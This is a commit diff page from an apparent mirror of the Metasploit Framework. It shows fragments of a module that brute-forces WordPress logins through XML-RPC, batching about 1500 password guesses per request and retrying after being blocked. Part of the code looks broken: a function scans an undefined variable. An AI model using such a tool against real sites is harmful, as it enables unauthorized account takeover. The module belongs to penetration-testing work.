infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add wordpress masive bruteforce using XMLRPC (wordpress API)

bug/bundler_fix
KINGSABRI 2015-11-09 18:23:15 +03:00
parent 9586f416a1
commit 2bf57a3cf3
1 changed files with 9 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

17
modules/auxiliary/scanner/http/wordpress_xmlrpc_massive_bruteforce.rb
View File

@ -7,7 +7,7 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::HTTP::Wordpress include Msf::Exploit::Remote::HTTP::Wordpress
def initialize(info = {}) def initialize(info = {})
super(update_info( super(update_info(
@ -17,8 +17,8 @@ class Metasploit3 < Msf::Auxiliary
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => 'Author' =>
[ [
'Sabri (@KINGSABRI)', # MSF module 'William (WCoppola@Lares.com)',
'William (WCoppola@Lares.com)' # Requester 'Sabri (@KINGSABRI)'
], ],
'References' => 'References' =>
[ [
@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary
OptPath.new('WPUSER_FILE', [true, 'File containing usernames, one per line', OptPath.new('WPUSER_FILE', [true, 'File containing usernames, one per line',
File.join(Msf::Config.data_directory, "wordlists", "http_default_users.txt") ]), File.join(Msf::Config.data_directory, "wordlists", "http_default_users.txt") ]),
OptPath.new('WPPASS_FILE', [ true, 'File containing passwords, one per line', OptPath.new('WPPASS_FILE', [ true, 'File containing passwords, one per line',
File.join(Msf::Config.data_directory, "wordlists", "http_default_pass.txt")]) File.join(Msf::Config.data_directory, "wordlists", "http_default_pass.txt")])
], self.class) ], self.class)
@ -56,8 +56,8 @@ class Metasploit3 < Msf::Auxiliary
print_warning('Generating XMLs may take a while depends on the list file(s) size.') if passwords.size > 1500 print_warning('Generating XMLs may take a while depends on the list file(s) size.') if passwords.size > 1500
xml_payloads = [] # Container for all generated XMLs xml_payloads = [] # Container for all generated XMLs
xml = '' xml = ""
# Evil XML | Limit number of log-ins to 1500/request for wordpress limitation # Evil XML | Limit number of log-ins to 1700/request for wordpress limitation
passwords.each_slice(1500) do |pass_group| passwords.each_slice(1500) do |pass_group|
xml = "<?xml version=\"1.0\"?>\n" xml = "<?xml version=\"1.0\"?>\n"
@ -113,7 +113,9 @@ class Metasploit3 < Msf::Auxiliary
end end
def parse_response(res) def parse_response(res)
resp.scan(/Incorrect username or password/) resp.scan(/Incorrect username or password/)
end end
def run def run
@ -158,7 +160,7 @@ class Metasploit3 < Msf::Auxiliary
end end end end
rescue NoMethodError rescue NoMethodError
print_error("It seems you got blocked!") print_error("It seems you got blocked!")
print_warning("I'll sleep for 6 minutes then I'll try again. CTR+C to exit") print_warning("I'll sleep for 6 minutes then I'll try again. CTR+C to exit")
sleep 6 * 60 sleep 6 * 60
retry retry
# return :abort # return :abort
@ -168,4 +170,3 @@ class Metasploit3 < Msf::Auxiliary
end end end end end end
end end